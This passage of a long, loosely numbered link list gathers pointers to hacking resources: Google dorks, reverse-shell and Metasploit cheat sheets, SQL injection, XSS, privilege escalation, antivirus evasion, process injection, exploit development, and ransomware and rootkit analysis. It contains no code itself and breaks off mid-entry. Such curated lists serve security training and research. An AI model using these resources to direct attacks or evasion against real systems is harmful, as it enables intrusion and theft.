HACKİNG DATABASE – GHDB:\n\n\nhttps://pastebin.com/raw/1ndqG7aq\n\n\n-1041-STEALING PASSWORD WITH GOOGLE HACK:\n\n\nhttps://pastebin.com/raw/x6BNZ7NN\n\n\n-1042-Hack Remote PC with PHP File using PhpSploit Stealth Post-Exploitation Framework:\n\n\nhttp://www.hackingarticles.in/hack-remote-pc-with-php-file-using-phpsploit-stealth-post-exploitation-framework\n\n\n\n-1043-Open Source database of android malware:\n\n\nwww.code.google.com/archive/p/androguard/wikis/DatabaseAndroidMalwares.wiki\n\n\n-1044-big-list-of-naughty-strings:\n\n\nhttps://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt\n\n\n-1045-publicly available cap files:\n\n\nhttp://www.netresec.com/?page=PcapFiles\n\n\n-1046-“Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”:\n\n\nhttp://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.119.399&rep=rep1&type=pdf\n\n\n-1047-Building a malware analysis toolkit:\n\n\nhttps://zeltser.com/build-malware-analysis-toolkit/\n\n\n\n-1048-Netcat Reverse Shell Cheat Sheet:\n\n\nhttp://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n\n\n\n-1049-Packers and crypters:\n\n\nhttp://securityblog.gr/2950/detect-packers-cryptors-and-compilers/\n\n\n\n-1050-Evading antivirus:\n\n\nhttp://www.blackhillsinfosec.com/?p=5094\n\n\n\n-1051-cheat sheets and information,The Art of Hacking:\n\n\nhttps://github.com/The-Art-of-Hacking\n\n\n-1052-Error-based SQL injection:\n\n\nhttps://www.exploit-db.com/docs/37953.pdf\n\n\n-1053-XSS cheat sheet:\n\n\nhttps://www.veracode.com/security/xss\n\n\n-1054-Active Directory Enumeration with PowerShell:\n\n\nhttps://www.exploit-db.com/docs/46990\n\n\n\n-1055-Buffer Overflows, C Programming, NSA GHIDRA and More:\n\n\nhttps://www.exploit-db.com/docs/47032\n\n\n\n-1056-Analysis of CVE-2019-0708 (BlueKeep):\n\n\nhttps://www.exploit-db.com/docs/46947\n\n\n\n-1057-Windows Privilege Escalations:\n\n\nhttps://www.exploit-db.com/docs/46131\n\n\n\n-1058-The Ultimate Guide For Subdomain 
Takeover with Practical:\n\n\n\nhttps://www.exploit-db.com/docs/46415\n\n\n\n-1059-File transfer skills in the red team post penetration test:\n\n\nhttps://www.exploit-db.com/docs/46515\n\n\n\n-1060-How To Exploit PHP Remotely To Bypass Filters & WAF Rules:\n\n\n\nhttps://www.exploit-db.com/docs/46049\n\n\n\n-1061-Flying under the radar:\n\n\n\nhttps://www.exploit-db.com/docs/45898\n\n\n-1062-what is google hacking? and why it is useful ?and how you can learn how to use it:\n\n\nhttps://twitter.com/cry__pto/status/1142497470825545729?s=20\n\n\n-1063-useful blogs for penetration testers:\n\n\nhttps://twitter.com/cry__pto/status/1142497470825545729?s=20\n\n\n\n-1064-useful #BugBounty resources & links & tutorials & explanations & writeups ::\n\n\nhttps://twitter.com/cry__pto/status/1143965322233483265?s=20\n\n\n\n-1065-Union- based SQL injection:\n\n\nhttp://securityidiots.com/Web-Pentest/SQL-Injection/Basic-Union-Based-SQL-Injection.html\n\n\n-1066-Broken access control:\n\n\nhttps://www.happybearsoftware.com/quick-check-for-access-control-vulnerabilities-in-rails\n\n\n-1067-Understanding firewall types and configurations:\n\n\nhttp://searchsecurity.techtarget.com/feature/The-five-different-types-of-firewalls\n\n\n-1068-5 Kali Linux tricks that you may not know:\n\n\nhttps://pentester.land/tips-n-tricks/2018/11/09/5-kali-linux-tricks-that-you-may-not-know.html\n\n\n\n-1069-5 tips to make the most of Twitter as a pentester or bug bounty hunter:\n\n\nhttps://pentester.land/tips-n-tricks/2018/10/23/5-tips-to-make-the-most-of-twitter-as-a-pentester-or-bug-bounty-hunter.html\n\n\n-1060-A Guide To Subdomain Takeovers:\n\n\nhttps://www.hackerone.com/blog/Guide-Subdomain-Takeovers\n\n\n-1061-Advanced Recon Automation (Subdomains) case 1:\n\n\nhttps://medium.com/p/9ffc4baebf70\n\n\n-1062-Security testing for REST API with 
w3af:\n\n\nhttps://medium.com/quick-code/security-testing-for-rest-api-with-w3af-2c43b452e457?source=post_recirc---------0------------------\n\n\n\n-1062-The Lazy Hacker:\n\n\nhttps://securit.ie/blog/?p=86\n\n\n-1063-Practical recon techniques for bug hunters & pen testers:\n\n\nhttps://github.com/appsecco/practical-recon-levelup0x02/raw/200c43b58e9bf528a33c9dfa826fda89b229606c/practical_recon.md\n\n\n\n-1064-A More Advanced Recon Automation #1 (Subdomains):\n\n\nhttps://poc-server.com/blog/2019/01/18/advanced-recon-subdomains/\n\n\n\n-1065-Expanding your scope (Recon automation #2):\n\n\n\nhttps://poc-server.com/blog/2019/01/31/expanding-your-scope-recon-automation/\n\n\n\n-1066-RCE by uploading a web.config:\n\n\n\nhttps://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/\n\n\n\n-1067-Finding and exploiting Blind XSS:\n\n\nhttps://enciphers.com/finding-and-exploiting-blind-xss/\n\n\n\n-1068-Google dorks list 2018:\n\n\nhttp://conzu.de/en/google-dork-liste-2018-conzu\n\n\n-1096-Out of Band Exploitation (OOB) CheatSheet:\n\n\nhttps://www.notsosecure.com/oob-exploitation-cheatsheet/\n\n\n-1070-Metasploit Cheat Sheet:\n\n\nhttps://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/\n\n\n\n\n-1071-Linux Post Exploitation Cheat Sheet :\n\n\n\nred-orbita.com/?p=8455\n\n\n\n\n\n-1072-OSCP/Pen Testing Resources :\n\n\nhttps://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45\n\n\n\n-1073-Out Of Band Exploitation (OOB) CheatSheet :\n\n\nhttps://packetstormsecurity.com/files/149290/Out-Of-Band-Exploitation-OOB-CheatSheet.html\n\n\n\n\n-1074-HTML5 Security Cheatsheet:\n\n\nhttps://html5sec.org/\n\n\n\n-1075-Kali Linux Cheat Sheet for Penetration Testers:\n\n\nhttps://www.blackmoreops.com/2016/12/20/kali-linux-cheat-sheet-for-penetration-testers/\n\n\n\n\n-1076-Responder - CheatSheet:\n\n\nhttps://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/\n\n\n\n\n-1076-Windows Post-Exploitation Command 
List:\n\n\n\npentest.tonyng.net/windows-post-exploitation-command-list/\n\n\n\n\n-1077-Transfer files (Post explotation) - CheatSheet\n\n\n\nhttps://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/\n\n\n\n-1078-SQL Injection Cheat Sheet: MSSQL — GracefulSecurity:\n\n\n\nhttps://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/\n\n\n\n-1079-OSCP useful resources and tools:\n\n\n\nhttps://acknak.fr/en/articles/oscp-tools/\n\n\n\n-1080-Penetration Testing 102 - Windows Privilege Escalation - Cheatsheet:\n\n\nwww.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet\n\n\n\n-1081-Transferring files from Kali to Windows (post exploitation) :\n\n\n\nhttps://blog.ropnop.com/transferring-files-from-kali-to-windows/\n\n\n\n-1082-Hack Like a Pro: The Ultimate Command Cheat Sheet for Metasploit:\n\n\n\nhttps://null-byte.wonderhowto.com/.../hack-like-pro-ultimate-command-cheat-sheet-f...\n\n\n\n\n-1083-OSCP Goldmine (not clickbait):\n\n\n\n0xc0ffee.io/blog/OSCP-Goldmine\n\n\n\n-1084-Privilege escalation: Linux :\n\n\n\nhttps://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux\n\n\n\n\n-1085-Exploitation Tools Archives :\n\n\n\nhttps://pentesttools.net/category/exploitationtools/\n\n\n\n-1086-From Local File Inclusion to Remote Code Execution - Part 1:\n\n\n\nhttps://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1\n\n\n\n\n-1087-Basic Linux Privilege Escalation:\n\n\n\nhttps://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/\n\n\n\n-1088-Title: Ultimate Directory Traversal & Path Traversal Cheat Sheet:\n\n\n\nwww.vulnerability-lab.com/resources/documents/587.txt\n\n\n\n-1089-Binary Exploitation:\n\n\n\nhttps://pwndevils.com/hacking/howtwohack.html\n\n\n\n\n1090-A guide to Linux Privilege Escalation:\n\n\nhttps://payatu.com/guide-linux-privilege-escalation/\n\n\n\n-1091-Penetration Testing Tools Cheat Sheet 
:\n\n\n\nhttps://news.ycombinator.com/item?id=11977304\n\n\n\n\n-1092-List of Metasploit Commands - Cheatsheet:\n\n\n\nhttps://thehacktoday.com/metasploit-commands/\n\n\n\n-1093-A journey into Radare 2 – Part 2: Exploitation:\n\n\n\nhttps://www.megabeets.net/a-journey-into-radare-2-part-2/\n\n\n\n-1094-Remote Code Evaluation (Execution) Vulnerability:\n\n\n\nhttps://www.netsparker.com/blog/web-security/remote-code-evaluation-execution/\n\n\n\n-1095-Exploiting Python Code Injection in Web Applications:\n\n\n\nhttps://www.securitynewspaper.com/.../exploiting-python-code-injection-web-applicat...\n\n\n\n\n-1096-Shells · Total OSCP Guide:\n\n\n\nhttps://sushant747.gitbooks.io/total-oscp-guide/reverse-shell.html\n\n\n\n-1097-MongoDB Injection cheat sheet Archives:\n\n\n\nhttps://blog.securelayer7.net/tag/mongodb-injection-cheat-sheet/\n\n\n\n-1098-Basic Shellshock Exploitation:\n\n\n\nhttps://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/\n\n\n\n-1099-Wireshark Tutorial and Tactical Cheat Sheet :\n\n\nhttps://hackertarget.com/wireshark-tutorial-and-cheat-sheet/\n\n\n\n-1100-Windows Command Line cheatsheet (part 2):\n\n\nhttps://www.andreafortuna.org/2017/.../windows-command-line-cheatsheet-part-2-wm...\n\n\n\n-1101-Detecting WMI exploitation:\n\n\n\nwww.irongeek.com/i.php?page=videos/derbycon8/track-3-03...exploitation...\n\n\n\n1102-Metasploit Cheat Sheet - Hacking Land :\n\n\n\nhttps://www.hacking.land/2019/02/metasploit-cheat-sheet.html\n\n\n\n\n-1103-5 Practical Scenarios for XSS Attacks:\n\n\n\nhttps://pentest-tools.com/blog/xss-attacks-practical-scenarios/\n\n\n\n-1104-Ultimate gdb cheat sheet:\n\n\n\nhttp://nadavclaudecohen.com/2017/10/10/ultimate-gdb-cheat-sheet/\n\n\n\n-1105-Reverse Engineering Cheat Sheet:\n\n\nhttps://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet\n\n\n\n-1106-Reverse Engineering Cheat Sheet:\n\n\n\nhttps://www.scribd.com/document/94575179/Reverse-Engineering-Cheat-Sheet\n\n\n\n-1107-Reverse Engineering For 
Malware Analysis:\n\n\n\nhttps://eforensicsmag.com/reverse_engi_cheatsheet/\n\n\n\n\n-1108-Reverse-engineering Cheat Sheets :\n\n\n\nhttps://www.cheatography.com/tag/reverse-engineering/\n\n\n\n-1109-Shortcuts for Understanding Malicious Scripts:\n\n\n\nhttps://www.linkedin.com/pulse/shortcuts-understanding-malicious-scripts-viviana-ross\n\n\n\n\n\n-1110-WinDbg Malware Analysis Cheat Sheet :\n\n\n\nhttps://oalabs.openanalysis.net/2019/02/18/windbg-for-malware-analysis/\n\n\n\n\n-1111-Cheat Sheet for Malware Analysis:\n\n\n\n\nhttps://www.andreafortuna.org/2016/08/16/cheat-sheet-for-malware-analysis/\n\n\n\n\n-1112-Tips for Reverse-Engineering Malicious Code :\n\n\n\nhttps://www.digitalmunition.me/tips-reverse-engineering-malicious-code-new-cheat-sheet\n\n\n\n-1113-Cheatsheet for radare2 :\n\n\n\nhttps://leungs.xyz/reversing/2018/04/16/radare2-cheatsheet.html\n\n\n\n\n\n-1114-Reverse Engineering Cheat Sheets:\n\n\n\n\nhttps://www.pinterest.com/pin/576390452300827323/\n\n\n\n\n-1115-Reverse Engineering Resources-Beginners to intermediate Guide/Links:\n\n\n\nhttps://medium.com/@vignesh4303/reverse-engineering-resources-beginners-to-intermediate-guide-links-f64c207505ed\n\n\n\n\n\n-1116-Malware Resources :\n\n\n\nhttps://www.professor.bike/malware-resources\n\n\n\n-1117-Zero-day exploits: A cheat sheet for professionals:\n\n\nhttps://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/\n\n\n\n-1118-Getting cozy with exploit development:\n\n\n\nhttps://0x00sec.org/t/getting-cozy-with-exploit-development/5311\n\n\n\n\n\n-1119-appsec - Web Security Cheatsheet :\n\n\nhttps://security.stackexchange.com/questions/2985/web-security-cheatsheet-todo-list\n\n\n\n\n-1120-PEDA - Python Exploit Development Assistance For GDB:\n\n\n\nhttps://www.pinterest.ru/pin/789044797190775841/\n\n\n\n-1121-Exploit Development Introduction (part 1) :\n\n\n\nhttps://www.cybrary.it/video/exploit-development-introduction-part-1/\n\n\n\n-1122-Windows Exploit Development: A simple 
buffer overflow example:\n\n\nhttps://medium.com/bugbountywriteup/windows-expliot-dev-101-e5311ac284a\n\n\n\n\n-1123-Exploit Development-Everything You Need to Know:\n\n\n\nhttps://null-byte.wonderhowto.com/how-to/exploit-development-everything-you-need-know-0167801/\n\n\n\n-1124-Exploit Development :\n\n\nhttps://0x00sec.org/c/exploit-development\n\n\n\n-1125-Exploit Development - Infosec Resources:\n\n\n\nhttps://resources.infosecinstitute.com/category/exploit-development/\n\n\n\n-1126-Exploit Development :\n\n\n\nhttps://www.reddit.com/r/ExploitDev/\n\n\n\n-1127-A Study in Exploit Development - Part 1: Setup and Proof of Concept :\n\n\n\nhttps://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept\n\n\n\n-1128-Exploit Development for Beginners:\n\n\nhttps://www.youtube.com/watch?v=tVDuuz60KKc\n\n\n\n-1129-Introduction to Exploit Development:\n\n\n\nhttps://www.fuzzysecurity.com/tutorials/expDev/1.html\n\n\n\n-1130-Exploit Development And Reverse Engineering:\n\n\n\nhttps://www.immunitysec.com/services/exploit-dev-reverse-engineering.html\n\n\n\n-1131-wireless forensics:\n\n\n\nhttps://www.sans.org/reading-room/whitepapers/wireless/80211-network-forensic-analysis-33023\n\n\n\n-1132-fake AP Detection:\n\n\nhttps://www.sans.org/reading-room/whitepapers/detection/detecting-preventing-rogue-devices-network-1866\n\n\n\n-1133-In-Depth analysis of SamSam Ransomware:\n\n\nhttps://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/\n\n\n\n-1134-WannaCry ransomware:\n\n\nhttps://www.endgame.com/blog/technical-blog/wcrywanacry-ransomware-technical-analysis\n\n\n\n-1135-malware analysis:\n\n\nhttps://www.sans.org/reading-room/whitepapers/malicious/paper/2103\n\n\n\n-1136-Metasploit's detailed communication and protocol writeup:\n\n\nhttps://www.exploit-db.com/docs/english/27935-metasploit---the-exploit-learning-tree.pdf\n\n\n\n-1137-Metasploit's SSL-generation 
module::\n\n\n\nhttps://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/lib/rex/post/meterpreter/client.rb\n\n\n\n-1139-Empire IOCs::\n\n\nhttps://www.sans.org/reading-room/whitepapers/detection/disrupting-empire-identifying-powershell-empire-command-control-activity-38315\n\n\n\n-1140-excellent free training on glow analysis:\n\n\nhttp://opensecuritytraining.info/Flow.html\n\n\n-1141-NetFlow using Silk:\n\n\nhttps://tools.netsa.cert.org/silk/analysis-handbook.pdf\n\n\n\n-1142-Deep Packet Inspection:\n\n\nhttps://is.muni.cz/th/ql57c/dp-svoboda.pdf\n\n\n\n-1143-Detecting Behavioral Personas with OSINT and Datasploit:\n\n\nhttps://www.exploit-db.com/docs/45543\n\n\n\n-1144-WordPress Penetration Testing using WPScan and MetaSploit:\n\n\nhttps://www.exploit-db.com/docs/45556\n\n\n\n-1145-Bulk SQL Injection using Burp-to-SQLMap:\n\n\n\nhttps://www.exploit-db.com/docs/45428\n\n\n\n\n-1146-XML External Entity Injection - Explanation and Exploitation:\n\n\n\nhttps://www.exploit-db.com/docs/45374\n\n\n\n\n-1147-\tWeb Application Firewall (WAF) Evasion Techniques #3 (CloudFlare and ModSecurity OWASP CRS3):\n\n\n\nhttps://www.exploit-db.com/docs/45368\n\n\n\n-1148-File Upload Restrictions Bypass:\n\n\nhttps://www.exploit-db.com/docs/45074\n\n\n\n-1149-VLAN Hopping Attack:\n\n\nhttps://www.exploit-db.com/docs/45050\n\n\n\n\n-1150-Jigsaw Ransomware Analysis using Volatility:\n\n\nhttps://medium.com/@0xINT3/jigsaw-ransomware-analysis-using-volatility-2047fc3d9be9\n\n\n\n-1151-Ransomware early detection by the analysis of file sharing traffic:\n\n\n\nhttps://www.sciencedirect.com/science/article/pii/S108480451830300X\n\n\n\n\n-1152-Do You Think You Can Analyse Ransomware?:\n\n\n\nhttps://medium.com/asecuritysite-when-bob-met-alice/do-you-think-you-can-analyse-ransomware-bbc813b95529\n\n\n\n\n-1153-Analysis of LockerGoga Ransomware :\n\n\n\nhttps://labsblog.f-secure.com/2019/03/27/analysis-of-lockergoga-ransomware/\n\n\n\n\n-1154-Detection and 
Forensic Analysis of Ransomware Attacks :\n\n\n\nhttps://www.netfort.com/assets/NetFort-Ransomware-White-Paper.pdf\n\n\n\n\n-1155-Bad Rabbit Ransomware Technical Analysis:\n\n\nhttps://logrhythm.com/blog/bad-rabbit-ransomware-technical-analysis/\n\n\n\n\n-1156-NotPetya Ransomware analysis :\n\n\nhttps://safe-cyberdefense.com/notpetya-ransomware-analysis/\n\n\n\n-1157-Identifying WannaCry on Your Server Using Logs:\n\n\n\nhttps://www.loggly.com/blog/identifying-wannacry-server-using-logs/\n\n\n\n\n-1158-The past, present, and future of ransomware:\n\n\nhttps://www.itproportal.com/features/the-past-present-and-future-of-ransomware/\n\n\n\n\n-1159-The dynamic analysis of WannaCry ransomware :\n\n\n\nhttps://ieeexplore.ieee.org/iel7/8318543/8323471/08323682.pdf\n\n\n\n-1160-Malware Analysis: Ransomware - SlideShare:\n\n\n\nhttps://www.slideshare.net/davidepiccardi/malware-analysis-ransomware\n\n\n\n\n-1161-Article: Anatomy of ransomware malware: detection, analysis :\n\n\nhttps://www.inderscience.com/info/inarticle.php?artid=84399\n\n\n\n-1162-Tracking desktop ransomware payments :\n\n\nhttps://www.blackhat.com/docs/us-17/wednesday/us-17-Invernizzi-Tracking-Ransomware-End-To-End.pdf\n\n\n\n\n-1163-What is Ransomware? 
Defined, Explained, and Explored:\n\n\n\nhttps://www.forcepoint.com/cyber-edu/ransomware\n\n\n\n-1164-Detect and Recover from Ransomware Attacks:\n\n\nhttps://www.indexengines.com/ransomware\n\n\n\n\n-1165-Wingbird rootkit analysis:\n\n\nhttps://artemonsecurity.blogspot.com/2017/01/wingbird-rootkit-analysis.html\n\n\n\n-1166-Windows Kernel Rootkits: Techniques and Analysis:\n\n\nhttps://www.offensivecon.org/trainings/2019/windows-kernel-rootkits-techniques-and-analysis.html\n\n\n\n-1167-Rootkit: What is a Rootkit and How to Detect It :\n\n\n\nhttps://www.veracode.com/security/rootkit\n\n\n\n-1168-Dissecting Turla Rootkit Malware Using Dynamic Analysis:\n\n\n\nhttps://www.lastline.com/.../dissecting-turla-rootkit-malware-using-dynamic-analysis/\n\n\n\n-1169-Rootkits and Rootkit Detection (Windows Forensic Analysis) Part 2:\n\n\n\nhttps://what-when-how.com/windows-forensic-analysis/rootkits-and-rootkit-detection-windows-forensic-analysis-part-2/\n\n\n\n\n-1170-ZeroAccess – an advanced kernel mode rootkit :\n\n\n\nhttps://www.botnetlegalnotice.com/ZeroAccess/files/Ex_12_Decl_Anselmi.pdf\n\n\n\n-1171-Rootkit Analysis Identification Elimination:\n\n\n\nhttps://acronyms.thefreedictionary.com/Rootkit+Analysis+Identification+Elimination\n\n\n\n\n\n-1172-TDL3: The Rootkit of All Evil?:\n\n\n\nstatic1.esetstatic.com/us/resources/white-papers/TDL3-Analysis.pdf\n\n\n\n\n-1173-Avatar Rootkit: Dropper Analysis:\n\n\n\nhttps://resources.infosecinstitute.com/avatar-rootkit-dropper-analysis-part-1/\n\n\n\n-1174-Sality rootkit analysis:\n\n\n\nhttps://www.prodefence.org/sality-rootkit-analysis/\n\n\n\n\n-1175-RootKit Hook Analyzer:\n\n\nhttps://www.resplendence.com/hookanalyzer/\n\n\n\n\n-1176-Behavioral Analysis of Rootkit Malware:\n\n\n\nhttps://isc.sans.edu/forums/diary/Behavioral+Analysis+of+Rootkit+Malware/1487/\n\n\n\n\n-1177-Malware Memory Analysis of the IVYL Linux Rootkit:\n\n\n\nhttps://apps.dtic.mil/docs/citations/AD1004349\n\n\n\n\n-1178-Analysis of the KNARK rootkit 
:\n\n\nhttps://linuxsecurity.com/news/intrusion-detection/analysis-of-the-knark-rootkit\n\n\n\n\n-1179-32 Bit Windows Kernel Mode Rootkit Lab Setup with INetSim :\n\n\n\nhttps://medium.com/@eaugusto/32-bit-windows-kernel-mode-rootkit-lab-setup-with-inetsim-e49c22e9fcd1\n\n\n\n-1180-Ten Process Injection Techniques: A Technical Survey of Common and Trending Process Injection Techniques:\n\n\n\nhttps://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process\n\n\n\n-1181-Code & Process Injection - Red Teaming Experiments:\n\n\n\nhttps://ired.team/offensive-security/code-injection-process-injection\n\n\n\n\n-1182-What Malware Authors Don't want you to know:\n\n\n\nhttps://www.blackhat.com/.../asia-17-KA-What-Malware-Authors-Don't-Want-You-To-Know\n\n\n\n\n-1183-.NET Process Injection:\n\n\n\nhttps://medium.com/@malcomvetter/net-process-injection-1a1af00359bc\n\n\n\n-1184-Memory Injection like a Boss :\n\n\n\nhttps://www.countercept.com/blog/memory-injection-like-a-boss/\n\n\n\n\n-1185-Process injection - Malware style:\n\n\n\nhttps://www.slideshare.net/demeester1/process-injection\n\n\n\n-1186-Userland API Monitoring and Code Injection Detection:\n\n\n\nhttps://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565\n\n\n\n\n-1187-Unpacking Redaman Malware & Basics of Self-Injection Packers:\n\n\n\nhttps://liveoverflow.com/unpacking-buhtrap-malware-basics-of-self-injection-packers-ft-oalabs-2/\n\n\n\n\n-1188-Code injection on macOS:\n\n\n\nhttps://knight.sc/malware/2019/03/15/code-injection-on-macos.html\n\n\n\n-1189-(Shell)Code Injection In Linux Userland :\n\n\n\nhttps://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md\n\n\n\n\n-1190-Code injection on Windows using Python:\n\n\n\nhttps://www.andreafortuna.org/2018/08/06/code-injection-on-windows-using-python-a-simple-example/\n\n\n\n\n-1191-What is Reflective DLL Injection and how can be 
detected?:\n\n\n\nhttps://www.andreafortuna.org/cybersecurity/what-is-reflective-dll-injection-and-how-can-be-detected/\n\n\n\n\n-1192-Windows Process Injection:\n\n\n\nhttps://modexp.wordpress.com/2018/08/23/process-injection-propagate/\n\n\n\n-1193-A+ cheat sheet:\n\n\n\nhttps://www.slideshare.net/abnmi/a-cheat-sheet\n\n\n-1194-A Bettercap Tutorial — From Installation to Mischief:\n\n\nhttps://danielmiessler.com/study/bettercap/\n\n\n\n\n-1195-Debugging Malware with WinDbg:\n\n\n\nhttps://www.ixiacom.com/company/blog/debugging-malware-windbg\n\n\n\n\n-1195-Malware analysis, my own list of tools and resources:\n\n\n\nhttps://www.andreafortuna.org/2016/08/05/malware-analysis-my-own-list-of-tools-and-resources/\n\n\n\n-1196-Getting Started with Reverse Engineering:\n\n\nhttps://lospi.net/developing/software/.../assembly/2015/03/.../reversing-with-ida.html\n\n\n\n-1197-Debugging malicious windows scriptlets with Google chrome:\n\n\n\nhttps://medium.com/@0xamit/debugging-malicious-windows-scriptlets-with-google-chrome-c31ba409975c\n\n\n\n-1198-Intro to Radare2 for Malware Analysis:\n\n\n\nhttps://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/\n\n\n\n\n-1199-Intro to Malware Analysis and Reverse Engineering:\n\n\n\nhttps://www.cybrary.it/course/malware-analysis/\n\n\n\n-1200-Common Malware Persistence Mechanisms:\n\n\nhttps://resources.infosecinstitute.com/common-malware-persistence-mechanisms/\n\n\n\n-1201-Finding Registry Malware Persistence with RECmd:\n\n\n\nhttps://digital-forensics.sans.org/blog/2019/05/07/malware-persistence-recmd\n\n\n\n-1202-Windows Malware Persistence Mechanisms :\n\n\nhttps://www.swordshield.com/blog/windows-malware-persistence-mechanisms/\n\n\n\n-1203- persistence techniques:\n\n\n\nhttps://www.andreafortuna.org/2017/07/06/malware-persistence-techniques/\n\n\n\n-1204- Persistence Mechanism - an overview | ScienceDirect 
Topics:\n\n\nhttps://www.sciencedirect.com/topics/computer-science/persistence-mechanism\n\n\n\n-1205-Malware analysis for Linux:\n\n\nhttps://www.sothis.tech/en/malware-analysis-for-linux-wirenet/\n\n\n\n-1206-Linux Malware Persistence with Cron:\n\n\nhttps://www.sandflysecurity.com/blog/linux-malware-persistence-with-cron/\n\n\n\n-1207-What is advanced persistent threat (APT)? :\n\n\n\nhttps://searchsecurity.techtarget.com/definition/advanced-persistent-threat-APT\n\n\n\n-1208-Malware Analysis, Part 1: Understanding Code Obfuscation :\n\n\nhttps://www.vadesecure.com/en/malware-analysis-understanding-code-obfuscation-techniques/\n\n\n\n-1209-Top 6 Advanced Obfuscation Techniques:\n\n\n\nhttps://sensorstechforum.com/advanced-obfuscation-techniques-malware/\n\n\n\n-1210-Malware Obfuscation Techniques:\n\n\n\nhttps://dl.acm.org/citation.cfm?id=1908903\n\n\n\n-1211-How Hackers Hide Their Malware: Advanced Obfuscation:\n\n\n\nhttps://www.darkreading.com/attacks-breaches/how-hackers-hide-their-malware-advanced-obfuscation/a/d-id/1329723\n\n\n\n\n-1212-Malware obfuscation techniques: four simple examples:\n\n\n\nhttps://www.andreafortuna.org/2016/10/13/malware-obfuscation-techniques-four-simple-examples/\n\n\n\n-1213-Malware Monday: Obfuscation:\n\n\nhttps://medium.com/@bromiley/malware-monday-obfuscation-f65239146db0\n\n\n\n-1213-Challenge of Malware Analysis: Malware obfuscation Techniques:\n\n\n\nhttps://www.ijiss.org/ijiss/index.php/ijiss/article/view/327\n\n\n\n\n-1214-Static Malware Analysis - Infosec Resources:\n\n\n\nhttps://resources.infosecinstitute.com/malware-analysis-basics-static-analysis/\n\n\n\n\n-1215-Malware Basic Static Analysis:\n\n\n\nhttps://medium.com/@jain.sm/malware-basic-static-analysis-cf19b4600725\n\n\n\n-1216-Difference Between Static Malware Analysis and Dynamic Malware Analysis:\n\n\n\nhttp://www.differencebetween.net/technology/difference-between-static-malware-analysis-and-dynamic-malware-analysis/\n\n\n\n\n-1217-What is Malware Analysis 
| Different Tools for Malware Analysis:\n\n\n\nhttps://blog.comodo.com/different-techniques-for-malware-analysis/\n\n\n\n-1218-Detecting Malware Pre-execution with Static Analysis and Machine Learning:\n\n\n\nhttps://www.sentinelone.com/blog/detecting-malware-pre-execution-static-analysis-machine-learning/\n\n\n\n\n-1219-Limits of Static Analysis for Malware Detection:\n\n\n\nhttps://ieeexplore.ieee.org/document/4413008\n\n\n\n-1220-Kernel mode versus user mode:\n\n\nhttps://blog.codinghorror.com/understanding-user-and-kernel-mode/\n\n\n\n-1221-Understanding the ELF:\n\n\nhttps://medium.com/@MrJamesFisher/understanding-the-elf-4bd60daac571\n\n\n\n-1222-Windows Privilege Abuse: Auditing, Detection, and Defense:\n\n\n\nhttps://medium.com/palantir/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e\n\n\n\n-1223-First steps to volatile memory analysis:\n\n\n\nhttps://medium.com/@zemelusa/first-steps-to-volatile-memory-analysis-dcbd4d2d56a1\n\n\n-1224-Maliciously Mobile: A Brief History of Mobile Malware:\n\n\n\nhttps://medium.com/threat-intel/mobile-malware-infosec-history-70f3fcaa61c8\n\n\n\n\n-1225-Modern Binary Exploitation Writeups 0x01:\n\n\n\nhttps://medium.com/bugbountywriteup/binary-exploitation-5fe810db3ed4\n\n\n-1226-Exploit Development 01 — Terminology:\n\n\n\nhttps://medium.com/@MKahsari/exploit-development-01-terminology-db8c19db80d5\n\n\n\n-1227-Zero-day exploits: A cheat sheet for professionals:\n\n\nhttps://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/\n\n\n-1228-Best google hacking list on the net:\n\n\nhttps://pastebin.com/x5LVJu9T\n\n\n\n-1229-Google Hacking:\n\n\nhttps://pastebin.com/6nsVK5Xi\n\n\n\n-1230-OSCP links:\n\n\nhttps://pastebin.com/AiYV80uQ\n\n\n\n\n-1231-Pentesting 1 Information gathering:\n\n\n\nhttps://pastebin.com/qLitw9eT\n\n\n\n\n-1232-OSCP-Survival-Guide:\n\n\nhttps://pastebin.com/kdc6th08\n\n\n\n-1233-Googledork:\n\n\nhttps://pastebin.com/qKwU37BK\n\n\n\n\n-1234-Exploit 
